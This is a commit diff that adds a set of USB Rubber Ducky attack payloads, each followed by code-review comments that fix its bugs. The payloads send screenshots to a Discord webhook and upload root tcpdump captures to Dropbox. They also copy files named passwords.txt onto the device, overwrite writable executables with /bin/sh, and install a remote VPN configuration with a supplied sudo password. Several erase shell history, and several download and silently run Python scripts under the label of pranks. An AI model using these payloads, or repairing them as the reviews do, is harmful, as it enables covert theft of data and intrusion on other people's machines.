Merge branch 'hak5:master' into master

pull/277/head
0iphor13 2023-04-25 09:43:51 +02:00 committed by GitHub
commit 1f42c9777b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
34 changed files with 1237 additions and 0 deletions


@ -0,0 +1,32 @@
# Exploiting An Executable File - Linux ✅
Plug-And-Play ❤️
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Category**: Execution
## Description
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Remember that any execution that is not permitted is not legitimate**.
## Getting Started
### Dependencies
* Linux system
### Executing program
* Plug in your device
### Settings
* You can edit the content that you want to put into the executable file.
```Shell
# You can put whatever you want into the executable file
echo "/bin/sh" > "$file"
```


@ -0,0 +1,40 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRINGLN
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file";
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file";
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami);
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents;
search_file "$DIR";
END_STRING
ENTER
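Review bot: The block opened with `STRINGLN` is closed with `END_STRING`, which is the terminator of a `STRING` block; if the firmware pairs terminators strictly this should read `END_STRINGLN`. Inside the typed function, `[[ -d "$file" ]]` is also true for a symlink to a directory, so a symlink loop recurses until bash gives up; `if [[ -d "$file" && ! -L "$file" ]]; then` avoids that. `DIR=/home/$USER/Documents` assumes home directories live under /home, whereas `DIR="$HOME/Documents"` uses what the login shell already knows. Both shell points apply equally to the standalone search_file.sh section below.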


@ -0,0 +1,19 @@
#!/bin/bash
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file"
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file"
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami)
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents
search_file "$DIR"


@ -0,0 +1,27 @@
# Set Arbitrary VPN - Linux ✅
A script used to set an arbitrary VPN on a Linux machine.
**Category**: Execution
## Description
A script used to set an arbitrary VPN on a Linux machine.
Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
* 'openvpn' installed
### Executing program
* Plug in your device
### Settings
* Set the VPN file link


@ -0,0 +1,71 @@
REM ####################################
REM # |
REM # Title : Set Arbitrary VPN |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ####################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
DEFINE VPN_FILE_LINK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### VPN SECTION ####
STRING curl
STRING VPN_FILE_LINK
STRING > vpn_configuration.ovpn
ENTER
REM It depends by the internet connection
DELAY 2000
STRING openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
REM #### REMOVE TRACES ####
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
STRING history -c
ENTER
DELAY 500
REM Exit from Sudo user
STRING exit
ENTER
DELAY 500
REM Close the shell
STRING exit
ENTER
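Review bot: `STRING curl`, `STRING VPN_FILE_LINK` and `STRING > vpn_configuration.ovpn` are typed back-to-back with no separating space, so unless trailing spaces survived in the file the shell receives `curlexample.com> vpn_configuration.ovpn`; since `DEFINE` substitution is textual, a single `STRING curl VPN_FILE_LINK > vpn_configuration.ovpn` should work, otherwise the spaces must be kept explicit. The `STRING openvpn vpn_configuration.ovpn` line has no `ENTER` after it, so the following `STRING rm ...` is appended to the same command line. The `curl -X POST` / `DROPBOX_API_CONST` / `--header` sequence in the Exfiltrate Network Traffic payload has the same missing-space problem. The sudo password and link live in plaintext `DEFINE`s, which the README should state so the payload file itself is handled as sensitive.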


@ -0,0 +1,29 @@
# Exfiltrate Computer Screenshots
A script used to prank your friends exfiltrating some screenshots.
**Category**: Exfiltration
## Description
A script used to prank your friends exfiltrating some screenshots.
Open a PowerShell, download the Python script and execute it. The Python script will make some screenshot that will be sent, through the discord webhook, to you.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook (or whatever you want for the exfiltration)
* ExecutionPolicy Bypass
* Python
### Executing program
* Plug in your device
### Settings
- Setup your Python script link in the payload.txt file
- Setup your Discord webhook link in the script.py file


@ -0,0 +1,39 @@
REM ###################################################
REM # |
REM # Title : Exfiltrate Computer Screenshots |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltrate |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4
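Review bot: The `DEFINE SCRIPT-PY-LINK example.com` placeholder has no scheme, and `Invoke-WebRequest -Uri "example.com"` will most likely be rejected as an invalid URI, so the comment above it should say the value must be a full URL: `REM REQUIRED - Set your Python script link as a full URL (https://...)`. The header lists `ExecutionPolicy Bypass` as a requirement, but nothing here runs a .ps1 file and `powershell` is started without `-ExecutionPolicy`, so the requirement appears inherited rather than needed. The Change Wallpaper With Screenshot payload further down is identical and has the same two points.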


@ -0,0 +1,34 @@
import pyautogui
from time import sleep
import requests
# YOUR DISCORD WEBHOOK
discord_webhook = "https://discord.com/api/webhooks/123456789/xxxxxxxxxx"
# Edit this variables as you want
SCREENSHOTS = 10
TIMING = 5
for i in range(SCREENSHOTS):
sleep(TIMING)
# take the screenshot
screenshot = pyautogui.screenshot()
screenshot.save("screenshot.png")
with open("screenshot.png", "rb") as f:
foto = f.read()
richiesta = {
"username": "ExfiltrateComputerScreenshot"
}
# Send the message by attaching the photo
response = requests.post(discord_webhook, data=richiesta, files={"Screen#"+str(i)+".png": foto})
# Useful for debugging
# if response.status_code == 200:
# print("Photo successfully sent!")
# else:
# print("Error while submitting photo." + str(response.status_code))
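Review bot: `response` on the `requests.post` line is assigned but never checked, and the call has no `timeout=`, so a stalled connection blocks the loop indefinitely; `response = requests.post(discord_webhook, data=richiesta, files={f"Screen#{i}.png": foto}, timeout=30)` followed by `response.raise_for_status()` makes failures visible and replaces the commented-out debugging block. The locals `foto` and `richiesta` are Italian while the rest of the file is English; `image_bytes` and `payload` read consistently. Indentation was lost in this rendering, so the body of the `for` loop cannot be verified from here.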


@ -0,0 +1,27 @@
# Exfiltrate Network Traffic - Linux ✅
A script used to exfiltrate the network traffic on a Linux machine.
**Category**: Exfiltrate
## Description
A script used to exfiltrate the network traffic on a Linux machine.
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token
* Set the sniffing filter


@ -0,0 +1,107 @@
REM #############################################
REM # |
REM # Title : Exfiltrate Network Traffic |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #############################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80
DEFINE SNIFFING example
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example
REM Just a Dropbox const
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRINGLN sudo su
DELAY 1000
STRINGLN SUDO_PASS
DELAY 1000
REM #### Network Traffic SECTION ####
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
DELAY 500
STRING filter_expression="
STRING SNIFFING
STRING "
ENTER
DELAY 500
REM Network card name
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
DELAY 500
REM Network dump
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
DELAY 500
REM Get PID
STRINGLN tcpdump_pid=$!
REM Set how long you want to sniff
DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER
REM #### REMOVE TRACES ####
STRINGLN rm "$FILE_PATH"
DELAY 500
STRINGLN history -c
DELAY 500
REM Exit from Sudo user
STRINGLN exit
DELAY 500
REM Close the shell
STRINGLN exit
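Review bot: The comment `REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file` sits above `DEFINE TOKEN example`, but the value is used as a bearer token, and `REM Output file path packets.pcap` sits above `DEFINE FILE example.pcap`; both should describe the value actually expected, e.g. `REM Dropbox access token sent in the Authorization header`. The `ip route get 8.8.8.8 | awk '{ print $5; exit }'` line assumes a `via` hop in the output; on a directly connected route the fifth field is not the device name, so picking the field after `dev` is the reliable form (the same line is in sniff.sh below). The header says `Category : Exfiltration` while the README for this payload says `Exfiltrate`; pick one spelling.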


@ -0,0 +1,12 @@
#!/bin/bash
filter_expression="tcp port 80"
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
tcpdump_pid=$!
sleep 60
kill $tcpdump_pid
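Review bot: `$filter_expression` on the `tcpdump` line is deliberately unquoted so the shell splits it into separate arguments, which shellcheck flags and which breaks as soon as the filter contains quotes; a bash array states the intent without relying on word splitting: `filter_expression=(tcp port 80)` and `tcpdump -i "$net_card" "${filter_expression[@]}" -w packets.pcap &`. A one-line header comment saying what is captured and that the capture stops after 60 seconds would help, since the sleep/kill pair is the only hint.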


@ -0,0 +1,47 @@
# Exfiltrate Files Through GUI - MacOS
Copies files with a certain name to ducky
**Category**: Exfiltration
## Description
A script used to open the finder, look for files with a certain name, then copy them all onto the Ducky
## Getting Started
### Dependencies
* None (That is the beauty of it)
### Executing program
* Plug in your device
### Settings
* Here you can define what files you want the ducky to look for. Note that the more matches there are the longer it will take to copy.
```DuckyScript
DEFINE #target the_filename_you_want.txt
```
* The main `DELAY` points in this script are before tabing 4 times to access the `DUCKY` USB as it is very random how long it takes (in my testing on an m1 pro 3-6 seconds) to show up and the one after the `COMMMAND v` which has to be adjusted depening on how generic the file name looked for it.
Delay for USB to show up:
```DuckyScript
REM This can take annoyingly long to show up which is why the delay is so big
DELAY 6000
REM Go to first result
DO_TABS()
```
Delay for how long the file copying takes:
```DuckyScript
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
COMMAND v
DELAY 7000
```
https://user-images.githubusercontent.com/69253692/230636177-ca9c5931-44ee-43a2-addc-4ee7f7fb0d62.mov


@ -0,0 +1,95 @@
REM ###################################################
REM # |
REM # Title : Exfiltrate Files through GUI mac |
REM # Author : Kile |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : MacOS |
REM # |
REM ###################################################
REM NOTE This is not unlikely to fail depending on the speed of search or if a large amount of files meet the criteria. Adjust DELAYs to your needs
ATTACKMODE STORAGE HID VID_05AC PID_021E
DELAY 2000
REM the filename for the payload to look for
DEFINE #target passwords.txt
REM Given that it uses the GUI it is a good idea to enable jitter to be less suspicious
$_JITTER_ENABLED = TRUE
REM This function tabs the amount of times it takes from a finder search to go onto the first file result (4)
FUNCTION DO_TABS()
VAR $COUNTER = 0
WHILE ($COUNTER < 4)
TAB
DELAY 100
$COUNTER = ($COUNTER + 1)
END_WHILE
END_FUNCTION
REM Open finder
COMMAND SPACE
STRINGLN finder
DELAY 500
REM Command n spawns a new window. This makes sure there is only one finder tab (for tabbing to the files later)
COMMAND n
REM Open search bar in finder
COMMAND f
DELAY 200
REM type target filename
STRING #target
DELAY 200
REM This specifies that the passwords.txt has to be a filename and not be in any file
DOWN
ENTER
ENTER
REM Give a bit to find all files
DELAY 500
REM now 4 tabs to get to the first file result
DO_TABS()
REM select all files that have the specified target in their name
COMMAND a
REM Copy the files
COMMAND c
DELAY 500
REM Go back to search window
COMMAND f
DELAY 200
REM Delete previous search
DEL
REM Search for DUCKY USB
STRING DUCKY
DELAY 200
DOWN
ENTER
REM Specifies that the "DUCKY" has to be an external USB drive
STRING Volume
DELAY 200
DOWN
DOWN
DOWN
ENTER
ENTER
REM This can take annoyingly long to show up which is why the delay is so big
DELAY 6000
REM Go to first result
DO_TABS()
REM Open the drive
COMMAND o
DELAY 1000
REM This takes a few seconds
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
COMMAND v
DELAY 7000
REM Hide
ATTACKMODE OFF
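Review bot: The comment `REM This specifies that the passwords.txt has to be a filename and not be in any file` hard-codes the default value while the search term is whatever `#target` is defined as; `REM Restrict the Finder search to file names matching #target rather than file contents` stays correct when the define changes. `REM This takes a few seconds` immediately above `REM Paste the copied files...` duplicates the next comment and can be dropped. `DO_TABS()` is explained, but the `DOWN`/`ENTER`/`ENTER` and `DOWN DOWN DOWN ENTER ENTER` sequences after each search are not, and they are the part most likely to differ between macOS versions.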


@ -0,0 +1,32 @@
# Alien Message From Computer
A script used to prank your friends with a script that simulate an Alien inside the computer.
**Category**: Prank
## Description
A script used to prank your friends with a script that simulate an Alien inside the computer.
Open a PowerShell, download the Python script and execute it. The Python script will simulate the Alien using the Python library pyttsx3.
## Getting Started
### Dependencies
* Internet Connection
* ExecutionPolicy Bypass
* Python
### Executing program
* Plug in your device
### Settings
* Nothing to setup, it is Plug-And-Play
### FAQs
- Why is the code in one line?
- In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired.


@ -0,0 +1,40 @@
REM ####################################################
REM # |
REM # Title : Alien Message From Computer |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################
REM Plug-And-Play <3
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1500
REM Create the file
STRING New-Item -Path ".\script.py" -ItemType "file" -Force
REM Write the code into the file
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
ENTER
DELAY 1000
REM Execute the Python script
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ENTER
REM Close the PowerShell
DELAY 1000
ALT F4
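Review bot: The `STRING New-Item -Path ".\script.py" -ItemType "file" -Force` line has no `ENTER` after it, so the following `STRING Set-Content ...` is typed onto the same command line and PowerShell sees `-ForceSet-Content`. Since `Set-Content` creates the file on its own, the simplest fix is to delete the `New-Item` line and its comment; otherwise add `ENTER` and a short `DELAY` after it. The one-liner also runs `pip install pyttsx3` unconditionally, whereas the script.py copy guards it behind an import check; the two copies should agree.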


@ -0,0 +1,25 @@
import os
from time import sleep
try:
import pyttsx3
except:
os.system("pip install pyttsx3")
import pyttsx3
# How much time you want to wait before speak
sleep(60)
alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'
motore = pyttsx3.init()
# Set alien voice
voce_alienea = motore.getProperty('voices')[1]
motore.setProperty('voice', voce_alienea.id)
# Set the pitch property to make the voice more alien-like
motore.setProperty('pitch', 70)
motore.say(alien_message)
motore.runAndWait()
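Review bot: The bare `except:` around `import pyttsx3` catches everything, including KeyboardInterrupt, before shelling out to pip; `except ImportError:` is the narrow form, and the runtime install deserves a comment noting it needs network access and a writable site-packages. `motore.getProperty('voices')[1]` raises IndexError on a system with a single installed voice; `voce_alienea = voices[1] if len(voices) > 1 else voices[0]` keeps the script running. Whether the `pitch` property is honoured depends on the pyttsx3 backend, so the comment above it should say the effect is best-effort.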


@ -0,0 +1,23 @@
# Change Wallpaper With Screenshot
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants. LOL
**Category**: Prank
## Description
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants.
Open a PowerShell, download the Python script and execute it. The Python script will make a screenshot that will be set as wallpaper on the computer where is runned.
## Getting Started
### Dependencies
* Internet Connection
* ExecutionPolicy Bypass
* Python
### Settings
- Setup your Python script link in the payload.txt file


@ -0,0 +1,38 @@
REM ######################################################
REM # |
REM # Title : Change Wallpaper With Screenshot |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4


@ -0,0 +1,29 @@
import os
try:
import pyautogui
except:
os.system("pip install pyautogui")
import pyautogui
from time import sleep
from PIL import Image
import ctypes
# Edit this time as you want...
sleep(30)
screenshot = pyautogui.screenshot()
screenshot.save("screenshot.png")
img = Image.open('screenshot.png')
# Resize the screenshot as the desktop resolution
user32 = ctypes.windll.user32
screensize = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)
img = img.resize(screensize)
# Set the new wallpaper
image_path = os.path.abspath('screenshot.png')
ctypes.windll.user32.SystemParametersInfoW(20, 0, image_path, 0)
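Review bot: `img = img.resize(screensize)` produces a resized image that is never written back, so `SystemParametersInfoW` is handed the original, unresized `screenshot.png`; either add `img.save('screenshot.png')` before `image_path` is computed or drop the resize block. The bare `except:` around `import pyautogui` should be `except ImportError:`, and `from PIL import Image` fails the same way if Pillow is missing but is not guarded. The magic `20` is `SPI_SETDESKWALLPAPER`; naming it in a constant, and noting that the trailing `0` (no `SPIF_UPDATEINIFILE`) means the change is not written to the profile, would document the call.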


@ -0,0 +1,27 @@
# Play A Song Through Spotify
A script used to prank friends by playing songs through spotify
**Category**: Prank
## Description
A script used to prank friends by playing songs through Spotify. Open a PowerShell, run Spotify, do some TABs for search the song and then play it.
**Some times** popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 (and the 43 for a DELAY) so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
## Getting Started
### Dependencies
* Internet Connection
* Spotify installed and user logged-in
* ExecutionPolicy Bypass
### Executing program
* Plug in your device
### Settings
- Setup the SONG-NAME that you want to play


@ -0,0 +1,57 @@
REM ##################################################
REM # |
REM # Title : Play A Song Through Spotify |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ##################################################
REM Requirements:
REM - Internet Connection
REM - Spotify installed and user logged-in
REM - ExecutionPolicy Bypass
REM REQUIRED - Set your song name
DEFINE SONG-NAME example
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Start-Process "spotify://"
DELAY 5000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
REM Some times popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
REM ESCAPE
REM DELAY 500
STRING SONG-NAME
ENTER
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
GUI m
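Review bot: The comment `REM Some times popups ... uncomment line 42 ...` refers to a line number that drifts with any edit (the README quotes 42 and 43 as well); `REM If an ad popup steals focus, uncomment the ESCAPE/DELAY pair below` keeps the reference stable. The four `TAB`/`DELAY 500` pairs could be written once in a `WHILE` loop like the other payloads in this commit use, making the tab count a single value to adjust. A one-line `REM` stating that the tabs land in the search box would help readers tuning the delays.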


@ -0,0 +1,24 @@
# Send Messages In Teams
A script used to prank your friends sending a message through the user Teams.
**Category**: Prank
## Description
A script used to prank your friends sending a message through the user Teams.
Open a PowerShell, stop Teams if is runned, run Teams, run new message function, search the receiver, write and send some messages, then close the app.
## Getting Started
### Dependencies
* Internet Connection
* Microsoft Teams installed and user logged-in
* ExecutionPolicy Bypass
* Python
### Settings
- Setup the receiver


@ -0,0 +1,65 @@
REM ###########################################
REM # |
REM # Title : Send Messages In Teams |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################
REM Requirements:
REM - Microsoft Teams installed and user logged-in
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM 1. Open a powershell
REM 2. Close if Teams is opens and reopen it
REM 3. Goto search bar
REM 4. Search the person by name, email, id or what you want...
REM 5. Downarrow and enter to open the chat
REM REQUIRED - Name, email, id or what you want for contact the target
DEFINE USER-ID example
REM REQUIRED - Messages
DEFINE MESSAGE1 example
REM ...
REM DEFINE MESSAGEN example..
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM #### Powershell ####
STRINGLN Stop-Process -Name "Teams"
DELAY 1000
STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)"
REM It depends by the computer power
DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
STRING USER-ID
ENTER
DELAY 2000
TAB
DELAY 1000
TAB
DELAY 1000
REM #### Messages ####
STRING MESSAGE1
ENTER
DELAY 1000
REM ...
REM STRINGLN MESSAGEN
DELAY 500
ALT F4
DELAY 500
ALT F4
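Review bot: `Stop-Process -Name "Teams"` writes an error whenever Teams is not already running, which is the normal case the step-2 comment describes; `STRINGLN Stop-Process -Name "Teams" -ErrorAction SilentlyContinue` keeps the error from cluttering the console. The `Start-Process` path builds `$Env:USERPROFILE\AppData\Roaming\...` by hand; `$Env:APPDATA\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)` is the environment variable meant for the roaming profile and survives a relocated AppData. The header lists Python as a requirement, but nothing in this payload invokes it.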


@ -0,0 +1,28 @@
# Set VSCode to light theme - MacOS ✅
Plug-And-Play ❤️
A script that sets the VSCode theme to light to let the nightmare of every developer come true!
**Category**: Execution
## Description
A script that opens VSCode, goes to the settings, changes the theme and then sneakily closes the settings again.
## Getting Started
### Dependencies
* MacOS system
* VSCode installed
### Executing program
* Plug in your device
### Settings
*None*
https://user-images.githubusercontent.com/69253692/231779555-bb0e86d1-61ae-4170-809e-0f0723c58445.mov


@ -0,0 +1,65 @@
REM ################################################
REM # |
REM # Title : Setting VSCode theme to light |
REM # Author : Kile |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : MacOS |
REM # |
REM ################################################
REM DESCRIPTION: Opens VSCode settings and sets it to light mode - beware, eyes may be permanently damaged
ATTACKMODE HID VID_05AC PID_021E
DELAY 500
REM Press the down arrow a lot to select the bottom most theme (which is a light theme)
FUNCTION DO_DOWNS()
VAR $COUNTER = 0
WHILE ($COUNTER < 20)
DOWN
$COUNTER = ($COUNTER + 1)
END_WHILE
END_FUNCTION
REM Open VSCode
COMMAND SPACE
STRING Visual Studio Code
DELAY 200
ENTER
DELAY 300
REM Open settings
COMMAND ,
DELAY 200
REM Look for "theme"
STRING theme
DELAY 200
ENTER
DELAY 200
REM Tab to the first result
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
REM Open the theme dropdown
ENTER
ENTER
DELAY 200
REM Note: There is also a key combinations to open a theme dropdown, however on that dropdown if you press down at the end it will go back up, so you canot be certain what mode is selected.
REM Select light mode
DO_DOWNS()
ENTER
DELAY 100
REM Close the settings window
COMMAND w
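Review bot: The header states `Category : Prank` while the README for this payload says `**Category**: Execution`; the two should agree, and the file reads as a prank. The `DELAY 300` after launching VSCode is short for a cold start, so `COMMAND ,` may be sent before the window has focus; the description line at the top is the place to say this is the delay to raise first. The comment `so you canot be certain` has a typo (`cannot`).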


@ -0,0 +1,69 @@
# "X-Frame-Options" Scanner
- Title: "X-Frame-Options" Scanner
- Author: TW-D
- Version: 1.0
- Category: Recon
## Description
Uses the "Microsoft Edge" web browser to search for web servers within
a range of IPv4 addresses that do not have an "X-Frame-Options" header.
Then exports the results to a PDF file accessible in the Rubber Ducky.
The results contain the tested IPv4 addresses and the HTML rendering.
## Tested On
>
> Microsoft Edge (Windows 10)
>
| X-Frame-Options | Encryption | Detectable |
| --- | --- | --- |
| None | None | Yes |
| Set to SAMEORIGIN | None | No |
| Set to SAMEORIGIN | Self-Signed Certificate | No |
__NOTE :__ *All cases could not be tested.*
## Configuration
In the "payload.txt" file, replace the values of the following constants :
```
REM ---
REM USB Rubber Ducky label.
REM ---
DEFINE #RD_LABEL DUCKY
REM ---
REM Format of an allowed IPv4 address range.
REM 192.168.0.X-192.168.0.Y where (X < Y)
REM ---
DEFINE #LAN 192.168.0.1-192.168.0.50
```
## Advanced Configuration
In the "main.js" file available in the "recon_files/assets/js/" directory,
you can add new ports to be tested for each host :
```js
if (LAN) {
Promise.all(
[
...,
recon('http', 8080),
recon('https', 8443)
]
);
}
```
## Usage
At the root of the USB Rubber Ducky, copy the "recon_files/" folder.


@ -0,0 +1,40 @@
REM TITLE : "X-Frame-Options" Scanner
REM AUTHOR : TW-D
REM TARGET : Microsoft Edge
REM VERSION : 1.0
REM CATEGORY : Recon
REM REQUIREMENT : DuckyScript 3.0
ATTACKMODE HID STORAGE
DELAY 10000
REM ---
REM USB Rubber Ducky label.
REM ---
DEFINE #RD_LABEL DUCKY
REM ---
REM Format of an allowed IPv4 address range.
REM 192.168.0.X-192.168.0.Y where (X < Y)
REM ---
DEFINE #LAN 192.168.0.1-192.168.0.50
SAVE_HOST_KEYBOARD_LOCK_STATE
IF ( $_CAPSLOCK_ON ) THEN
CAPSLOCK
DELAY 500
END_IF
IF ( $_NUMLOCK_ON == FALSE ) THEN
NUMLOCK
DELAY 500
END_IF
GUI r
DELAY 1500
STRINGLN CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR "#RD_LABEL"') DO @SET RD_LABEL=%d"
DELAY 2000
STRINGLN START MSEDGE --headless --disable-gpu --run-all-compositor-stages-before-draw --print-to-pdf="%RD_LABEL%\loot_%RANDOM%.pdf" "%RD_LABEL%\recon_files\index.html?lan=#LAN" && EXIT
RESTORE_HOST_KEYBOARD_LOCK_STATE
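Review bot: If no volume label matches `#RD_LABEL`, the `FOR /F` loop never sets `RD_LABEL` and the next line expands `%RD_LABEL%` to an empty string, so Edge is pointed at `\recon_files\index.html` on the current drive and the PDF is written there too; typing `IF NOT DEFINED RD_LABEL EXIT` between the two `STRINGLN`s makes the failure explicit. `FINDSTR "#RD_LABEL"` is a substring match, so a volume labelled `DUCKY2` would match as well; `FINDSTR /C:" DUCKY"` or the `/X` anchored form narrows it. The `DELAY 10000` has no comment saying what it waits for (presumably storage enumeration after `ATTACKMODE HID STORAGE`).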


@ -0,0 +1,25 @@
body {
margin: 0;
}
h1, #url {
text-align: center;
}
#url {
font-size: small;
border-width: 1px;
border-style: solid;
border-color: white;
color: whitesmoke;
padding: 1vh 0 1vh 0;
background-color: lightslategray;
}
iframe {
min-width: 100vw;
max-width: 100vw;
min-height: 98vh;
max-height: 98vh;
border-style: none;
}


@ -0,0 +1,2 @@
